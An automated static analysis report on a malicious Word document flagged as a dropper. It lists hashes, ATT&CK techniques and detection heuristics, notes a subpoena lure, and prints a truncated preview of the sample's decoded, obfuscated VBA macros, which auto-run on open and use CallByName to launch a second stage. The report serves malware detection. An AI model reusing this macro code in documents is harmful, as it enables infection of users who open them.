Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9a9761a8158b8f8c…

MALICIOUS

Office (OLE)

109.0 KB Created: 2016-04-27 16:07:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: a8cfa0d684e7da951f196dadf0ae777c SHA-1: 65cd0f69fabdae4ad5e4d4a78ff695a94f9329c0 SHA-256: 9a9761a8158b8f8c8431b757f9326d604652651286547a6c7a68913eac08781f
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script appears to be obfuscated but uses CreateObject and CallByName, indicating it likely attempts to download and execute a second-stage payload. The document body presents a subpoena to lure the user into enabling macros.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1399074 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1399074
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14360 bytes
SHA-256: fc615b8cb3a9096e06fb4d59a9c6e4e58d6b1cd102ef1a0abe19230fab3cdfc6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
TlZjc2De8.QQeu4iQ9ZhW
End Sub
Public Sub yj5zhKqBmrCl9PP()
Dim c3wXPiAOmzJYx As Object
Dim EVZTdzs As Integer
Dim DMkguWXTWAJm7sH As Variant
Dim oajqhL As Variant
On Error GoTo FPSPmRELh0f
Set c3wXPiAOmzJYx = evslot.yPZ74txZOio(nclOESQBrSf(mLug7isEYOXiC.gyClXPESEhF, 48), U2GPMn00xXx.SKW2fm)
EVZTdzs = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.uzNQPlLRAj, 114))
If EVZTdzs <> hBOZusH.GX4JInHqlx3rYNy Then
Err.Raise Number:=1
End If
DMkguWXTWAJm7sH = VriImfWA1KN(c3wXPiAOmzJYx, nclOESQBrSf(mLug7isEYOXiC.zsuVrFdyiyBmqa, 340))
oajqhL = U2GPMn00xXx.kG3kv8x & hBOZusH.qXC4lks3p & U2GPMn00xXx.cJuUNRrq8exCZ
wtmQYPJ oajqhL, DMkguWXTWAJm7sH
hsdrPqpzSAt oajqhL
Exit Sub
FPSPmRELh0f:
End Sub

Attribute VB_Name = "mLug7isEYOXiC"
Attribute VB_Base = "0{64E31D02-CDB4-4F26-8405-68C97F3169F6}{A702B371-FEAA-44A3-B829-DEDEBA91BDC8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "evslot"
Private Const vOTRpfGyCjYaAXtBKr As String = "rEqe5nNAVJbstLc9o"
Public Function yPZ74txZOio(ByVal ksBf8QOMgTj As Variant, ByVal EynrZa36t As Variant) As Variant
Set yPZ74txZOio = ZvpNmOJjZe.xKBUnEo2fp(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GRZAWXBhbl, 873))
TlZjc2De8.bBFHwI0Tji yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.tAannniEZ, 65), ksBf8QOMgTj, EynrZa36t, False
TlZjc2De8.n3l2A8olHz8c yPZ74txZOio, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.oPalzXQSuK, 68)
End Function
Public Function lkHsb4gDkL() As Integer
lkHsb4gDkL = 0
End Function
Public Function xIJO9if64KwwoxM() As Variant
xIJO9if64KwwoxM = U2GPMn00xXx.Kshb5HhPC9yf(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mxPoTjbX, 116), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.mkZHhwcJa, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.KVWdFbtc, 132), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.iGtMYvsOYp, 108), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.GyELCwmBxXz, 164), TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.EPqDUnY, 185))
End Function
Private Function SPKhXgyYpkGt() As Integer
SPKhXgyYpkGt = 1442
End Function
Public Function xdCXs90ZjRT1QzF() As Integer
xdCXs90ZjRT1QzF = 3170 / TlZjc2De8.fFS4YCN
End Function
Public Function rHAZXbgS5Ka() As Variant
rHAZXbgS5Ka = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.qPLWKDTnuKCoPT, 147))
End Function
Public Function A4VmYVPINyAof() As Integer
A4VmYVPINyAof = 2
End Function
Public Function CEtfkJI1() As Boolean
If U2GPMn00xXx.lEiihgAN54Gs0mL Or U2GPMn00xXx.CWDoi639bQ Then
CEtfkJI1 = U2GPMn00xXx.ruGHXG
Else
CEtfkJI1 = True
End If
End Function

Attribute VB_Name = "U2GPMn00xXx"
Public Function LwtDwU4K(ByVal dNScBRLkoFP As Object, ByVal Vl1NpbO6FtY As String, ByVal drLRiTo4jZw1p As Variant) As Variant
Set LwtDwU4K = CallByName(dNScBRLkoFP, Vl1NpbO6FtY, 1, drLRiTo4jZw1p)
End Function
Public Function VriImfWA1KN(ByVal dNScBRLkoFP As Object, ByVal cuLxHH62OJu7 As String) As Variant
VriImfWA1KN = CallByName(dNScBRLkoFP, cuLxHH62OJu7, 2)
End Function
Public Function kG3kv8x() As Variant
kG3kv8x = TlZjc2De8.WsJ9yFZs(TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.BzZfUYoGyS, 75))
End Function
Private Sub lWQz0T7mr(ByVal dNScBRLkoFP As Variant, ByVal Vl1NpbO6FtY As Variant, ByVal P4FL9kETbRJ As Variant, ByVal FsRcQJ8vgmMYOq As Variant)
CallByName dNScBRLkoFP, Vl1NpbO6FtY, 1, P4FL9kETbRJ, FsRcQJ8vgmMYOq
End Sub
Private Function pnkBfasJXi() As Variant
pnkBfasJXi = VriImfWA1KN(ThisDocument, TlZjc2De8.nclOESQBrSf(mLug7isEYOXiC.jBDagKNjX, 75))
End Function
Public Function Kshb5HhPC9yf(ParamArray VxplD2mN33P() As Variant) As Variant
Kshb5HhPC9yf = VxplD2mN33P
End Function
Public Function cJuUNRrq8exCZ() As String
cJuUNRrq8exCZ = TlZjc2De8.EQyqPA(Rnd)
End Fun
... (truncated)